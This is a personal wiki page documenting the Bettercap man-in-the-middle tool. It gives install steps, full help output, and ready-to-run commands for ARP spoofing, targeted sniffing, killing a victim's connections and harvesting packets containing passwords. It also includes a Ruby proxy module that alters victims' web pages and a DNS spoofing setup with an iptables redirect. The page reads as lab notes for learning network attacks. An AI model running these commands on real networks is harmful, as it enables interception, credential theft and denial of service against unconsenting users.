Bettercap
From charlesreid1
Project page: https://www.bettercap.org/
Contents
What is bettercap?
Bettercap is a better version of Ettercap. The intention was to create a new tool that worked the same, but better.
But what is it, really? It has two objectives: first, it is a tool for sniffing traffic, and second, it is a tool for carrying out man in the middle attacks (which enables the first type of attack - sniffing the traffic of your network neighbors).
Like Ettercap, Bettercap has several nice features:
- half and full duplex ARP spoofing
- ICMP/DNS/NDP spoofing
- Host discovery
- Credentials harvesting for multiple protocols (POST, HTTPS, FTP, IRC, POP, SMTP, etc)
- Customizable sniffer
- Modular HTTP/HTTPS proxies to allow for injection of custom HTML, JS, CSS code or urls
- SSLStripping with HSTS bypass
Dependencies
To install bettercap, you need ruby and libpcap:
$ apt-get install build-essential ruby-dev libpcap-dev
Install
Now install the bettercap gem:
$ gem install bettercap $ gem update bettercap
Bettercap Help and Command Line Options
Let's take a look at some of the important flags. Here's the help:
$ bettercap --help
Usage: bettercap [options]
MAIN:
-I, --interface IFACE Network interface name - default: wlan1
--use-mac ADDRESS Change the interface MAC address to this value before performing the attack.
--random-mac Change the interface MAC address to a random one before performing the attack.
-G, --gateway ADDRESS Manually specify the gateway address, if not specified the current gateway will be retrieved and used.
-T, --target ADDRESS1,ADDRESS2 Target IP addresses, if not specified the whole subnet will be targeted.
--ignore ADDRESS1,ADDRESS2 Ignore these addresses if found while searching for targets.
--no-discovery Do not actively search for hosts, just use the current ARP cache, default to false.
--no-target-nbns Disable target NBNS hostname resolution.
--packet-throttle NUMBER Number of seconds ( can be a decimal number ) to wait between each packet to be sent.
--check-updates Will check if any update is available and then exit.
-h, --help Display the available options.
LOGGING:
-O, --log LOG_FILE Log all messages into a file, if not specified the log messages will be only print into the shell.
--log-timestamp Enable logging with timestamps for each line, disabled by default.
-D, --debug Enable debug logging.
--silent Suppress every message which is not an error or a warning, default to false.
SPOOFING:
-S, --spoofer NAME Spoofer module to use, available: NONE, ICMP, ARP - default: ARP.
--no-spoofing Disable spoofing, alias for --spoofer NONE.
--half-duplex Enable half-duplex MITM, this will make bettercap work in those cases when the router is not vulnerable.
--kill Instead of forwarding packets, this switch will make targets connections to be killed.
SNIFFING:
-X, --sniffer Enable sniffer.
-L, --local Parse packets coming from/to the address of this computer ( NOTE: Will set -X to true ), default to false.
--sniffer-source FILE Load packets from the specified PCAP file instead of the interface ( will enable sniffer ).
--sniffer-output FILE Save all packets to the specified PCAP file ( will enable sniffer ).
--sniffer-filter EXPRESSION Configure the sniffer to use this BPF filter ( will enable sniffer ).
-P, --parsers PARSERS Comma separated list of packet parsers to enable, '*' for all ( NOTE: Will set -X to true ), available: FTP, REDIS,
TEAMVIEWER, MAIL, SNPP, NTLMSS, WHATSAPP, DHCP, URL, PGSQL, CREDITCARD, IRC, DICT, COOKIE, RLOGIN, NNTP, MYSQL, HTTPS,
POST, SNMP, MPD, HTTPAUTH - default: *
--custom-parser EXPRESSION Use a custom regular expression in order to capture and show sniffed data ( NOTE: Will set -X to true ).
PROXYING:
TCP:
--tcp-proxy Enable TCP proxy ( requires other --tcp-proxy-* options to be specified ).
--tcp-proxy-module MODULE Ruby TCP proxy module to load.
--tcp-proxy-port PORT Set local TCP proxy port, default to 2222 .
--tcp-proxy-upstream ADDRESS:PORT
Set TCP proxy upstream server address and port.
--tcp-proxy-upstream-address ADDRESS
Set TCP proxy upstream server address.
--tcp-proxy-upstream-port PORT
Set TCP proxy upstream server port.
HTTP:
--proxy Enable HTTP proxy and redirects all HTTP requests to it, default to false.
--proxy-port PORT Set HTTP proxy port, default to 8080.
--allow-local-connections Allow direct connections to the proxy instance, default to false.
--no-sslstrip Disable SSLStrip.
--proxy-module MODULE Ruby proxy module to load, either a custom file or one of the following: injecthtml, injectcss, injectjs.
--http-ports PORT1,PORT2 Comma separated list of HTTP ports to redirect to the proxy, default to 80.
--proxy-upstream-address ADDRESS
If set, only requests coming from this server address will be redirected to the HTTP/HTTPS proxies.
HTTPS:
--proxy-https Enable HTTPS proxy and redirects all HTTPS requests to it, default to false.
--proxy-https-port PORT Set HTTPS proxy port, default to 8083.
--proxy-pem FILE Use a custom PEM CA certificate file for the HTTPS proxy, default to /root/.bettercap/bettercap-ca.pem .
--https-ports PORT1,PORT2 Comma separated list of HTTPS ports to redirect to the proxy, default to 443.
CUSTOM:
--custom-proxy ADDRESS Use a custom HTTP upstream proxy instead of the builtin one.
--custom-proxy-port PORT Specify a port for the custom HTTP upstream proxy, default to 8080.
--custom-https-proxy ADDRESS Use a custom HTTPS upstream proxy instead of the builtin one.
--custom-https-proxy-port PORT
Specify a port for the custom HTTPS upstream proxy, default to 8083.
--custom-redirection RULE Apply a custom port redirection, the format of the rule is PROTOCOL ORIGINAL_PORT NEW_PORT.
For instance TCP 21 2100 will redirect all TCP traffic going to port 21, to port 2100.
SERVERS:
--httpd Enable HTTP server, default to false.
--httpd-port PORT Set HTTP server port, default to 8081.
--httpd-path PATH Set HTTP server path, default to ./ .
--dns FILE Enable DNS server and use this file as a hosts resolution table.
--dns-port PORT Set DNS server port, default to 5300.
For examples & docs please visit http://bettercap.org/docs/
Bettercap Most Important Flags
Most important flags are as follow:
-T: specify MiTM targets (IP or MAC)
-I: interface to use
-G: specify gateway address (usually automatic)
--no-discovery: don’t search for hosts (use ARP cache)
--ignore: ignore ADDRESS1,ADDRESS2
--check-updates: you guessed it
-h: get your options
Sniffing vs Spoofing
Like Ettercap, Bettercap has two functions:
- Sniff traffic
- Spoof traffic from other computers on the network through various attacks
Sniffing
TLDR: sniffing is what you do when you can see traffic that is not yours.
The simplest sniffing scenario is if you're sitting on a network hub (on which all traffic is broadcast to all ports) and sniffing all of the traffic that comes through that port. In this scenario, you have perfect visibility of all the traffic on a network. Normally you cannot sniff traffic because the network card will drop traffic not addressed to it, and because the network card will not forward packets. Sniffing tools fix that.
Spoofing
TLDR: spoofing is what you do when you cannot see traffic that is not yours - it's a way of maliciously capturing traffic.
If you're on a network switch or a wifi network, you will not have visibility of all packets on the network. If you are on a network switch, your port physically does not receive packets not intended for your device. If you are on a wifi network, your wifi card will drop frames not intended for your computer, and even if you kept the frames, you would be missing data, and would have an imperfect picture of the traffic.
The problem is resolved through spoofing. With spoofing, you can carry out attacks at Level 3, the packet level, by spoofing packets from different computers. For example, ARP spoofing sends out fake ARP reply packets, confusing network neighbors.
Basic Usage
Spoofing with bettercap
Let's run through your basic ARP poisoning attack.
-S specifies your spoofing method - either ARP or ICMP
--kill kills connections for any clients
--half-duplex is useful when you can't MITM the router - that is, when the router has protective mechanisms in place to prevent its ARP table from being corrupted. This type of attack gives you control over all traffic that is leaving, but not traffic that is coming to, the sheep.
$ bettercap -I wlan1 -O bettercap.log -S ARP
or add the -X flag (sniffer mode, covered below):
Sniffing with bettercap
By default, bettercap is not in sniffing mode, it is in MITM mode. You can run in sniffing mode only, or in MITM only, or in combination - bettercap is flexible.
-X turns on sniffer mode.
$ bettercap -I wlan1 -O bettercap.log -S ARP -X
Targeted sniffing with bettercap
Use the target flag to specify a target on the network:
$ bettercap -I wlan1 -O bettercap.log -S ARP -X --target 192.168.0.7
To Explore
Using proxy to replace web content
SSL
Ninja Dispatcher Silently Kills Network Connection
--kill
Instead of forwarding packets, this switch will make targets connections to be killed.
Sorry 192.168.1.2, you won’t connect to anything anymore.
sudo bettercap -T 192.168.1.2 --kill
Proxying
Bettercap has the capability to run a built-in http/https/tcp proxy server, allowing it to monitor, modify, inspect, inject, or drop http/https/tcp traffic (although https is a little harder, of course. See Man in the Middle/Traffic Injection for more info.) The https proxy server uses SSL Stripping and HSTS Bypass. The tcp proxy server uses raw TCP transparent proxies.
In practice, this means you have the ability to do whatever you want with the unencrypted (and potentially, if compromised, encrypted) communications going to or from a machine, including but certainly not limited to:
- Injecting Javascript on the target's visited pages (see Beef framework notes)
- Replacing every image in someone's web traffic with images of kittens and puppies (tool?)
- Downgrading encryption for a TLS conversation with STARTTLS
- Dumping custom protocols
Bettercap implements firewall rules and spoofing attack needed to redirect target traffic through the http/https/tcp proxy - eyyyy, don' worry 'bout it. You got bettercap to do than babysitting your attack.
There are 3 injection modules available:
- injecthtml
- injectcss
- injectjs
HTML injection
First, you can get help for a proxy module at the module level (general bettercap help provides zero information about how to use injection modules):
bettercap --proxy-module injecthtml -h
This outputs bettercap help, and at the very end, injecthtml help. This tells us we have two different options for injecting html:
--html-data to specify HTML code we want to inject, or --html-iframe-url to specify the URL of an iframe to be injected
JS injection
CSS injection
Custom Injection Module
Here's an example of a custom module that performs a custom action. Remember, this operates on the actual HTML content of the page that the sheep is going to receive. (Amaaaaazoooooong.)
class HackTitle < BetterCap::Proxy::HTTP::Module
meta(
'Name' => 'HackTitle',
'Description' => 'Adds a "!!! HACKED !!!" string to every webpage title.',
'Version' => '1.0.0',
'Author' => "Simone 'evilsocket' Margaritelli",
'License' => 'GPL3'
)
# called before the request is performed
def on_pre_request( request ); end
# this method is called after the request is performed
def on_request( request, response )
# is it a html page?
if response.content_type =~ /^text\/html.*/
BetterCap::Logger.info "Hacking http://#{request.host}#{request.url}"
# make sure to use sub! or gsub! to update the instance
response.body.sub!( '<title>', '<title> !!! HACKED !!! ' )
end
end
end
More Modules
Repository of all kinds of bettercap custom modules: https://github.com/evilsocket/bettercap-proxy-modules
DNS Spoofing
What is DNS?
Turns domain names like "google.com" into server IP addresses like "100.250.398.120"
See Linux/DNS
DNS Spoofing
With DNS spoofing, the attacker tricks the sheep into redirecting all of its DNS requests to the attacker, instead of to the gateway. This is a more selective attack than sniffing all of the sheep's traffic, as now we're simply listening for DNS requests.
Executing the Attack
Our first DNS attack will be more of a "hello world" attack - a denial of service on facebook.com.
Instead of seeing facebook.com, we want sheep to see this:
We'll host this image on a simple static HTML page using Bettercap's built-in lightweight http server (similar to the traffic modification attack where we replaced all the images in the sheep's New York Times news stream). We'll monitor the sheep's DNS requests, forwarding anything uninteresting. Whenever we detect a DNS request for facebook.com, Bettercap's DNS server will redirect the sheep to the attacker machine, and the sheep will see:
NOPE
Create Malicious Entries
Create a DNS configuration file with your malicious entries. I called mine extrabacon.conf.
extrabacon.conf:
# Empty lines or lines starting with # will be ignored. # redirect *.facebook.com to the attacker ip address local .*facebook\.com
Preparing Static Content
We will host the static content (1 html file, 1 image) required to deny sheep access to their precious facebook. I put everything into a pub/ directory, which is where I'll point bettercap when I tell it to run a public web server:
$ ls pub/ index.html nope.jpg
Here are the contents of that index.html page to host the NOPE image:
<html> <body style="background-color: #000;"> <img src="nope.jpg" alt="NOPE" /> </body> </html>
Firewall Redirect Port 80 to 8081 (bad idea)
The DNS redirection will only redirect sheep to the attacker, not to a port. Redirect all the attacker's port 80 http traffic to port 8081, where the Bettercap HTTP server will be running:
$ iptables -F $ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8081
You can test this out by typing "localhost" into your browser's address bar - it should redirect you to localhost:8081, and you should see NOPE.
Actually, the whole reason I had problems with the DNS spoofing was because bettercap was actually already doing this by default. This interferes with traffic your DNS attack is NOT supposed to filter out.
Bettercap DNS Spoofing Attack
Attempt 1 was a failure. Notes here: Bettercap/Failed DNS Spoofing Attack
Attempt 2 was a failure. Notes here: Bettercap/Failed DNS Spoofing Attack 2
kevin2k sez:
hi, you can add --httpd-port 80 to the command, because http server default port is 80.
One-Liners
Use bettercap as a simple local sniffer:
sudo bettercap -L
Spoof the whole network and save every packet to the capture.pcap file in your home directory:
sudo bettercap --sniffer-output ~/capture.pcap
Spoof the whole network but only sniff HTTP traffic:
sudo bettercap --sniffer-filter "tcp port http"
Spoof the whole network and extract data from packets containing the “password” word:
sudo bettercap --custom-parser ".*password.*"
Links
Project page: https://www.bettercap.org/
Basics: http://www.darknet.org.uk/2016/03/bettercap-modular-portable-mitm-framework/
Bettercap tutorial: https://danielmiessler.com/study/bettercap/
Flags
 |
monkey in the middle attacks in which an attacker tricks two parties into thinking they're communicating with each other, but both are communicating with the attacker.
Wireless Attacks: MITM/Wireless Wired Attacks: MITM/Wired
Layer 1 and 2 MITM Attacks: Network Tap: MITM/Wired/Network Tap Evil Twin Attack: Evil Twin · MITM/Evil Twin
Layer 3 and 4 MITM Attacks:
ARP Poisoning: MITM/ARP Poisoning Traffic Injection/Modification: MITM/Traffic Injection DNS Attacks: MITM/DNS · Bettercap/Failed DNS Spoofing Attack · Bettercap/Failed DNS Spoofing Attack 2 DHCP Attacks: MITM/DHCP WPAD MITM Attack: MITM/WPAD Port Stealing: MITM/Port Stealing Rushing Attack: MITM/Rushing Attack Attacking HTTPS: MITM/HTTPS
Session Hijacking: MITM/Session Hijacking
Toolz:
SSLSniff · SSLStrip · Frankencert
MITM Labs: {{MITMLabs}}
Category:MITM · Category:Attacks · Category:Kali Attack Layers Template:MITMLabs · Template:MITMFlag Flags · Template:MITMFlag · e |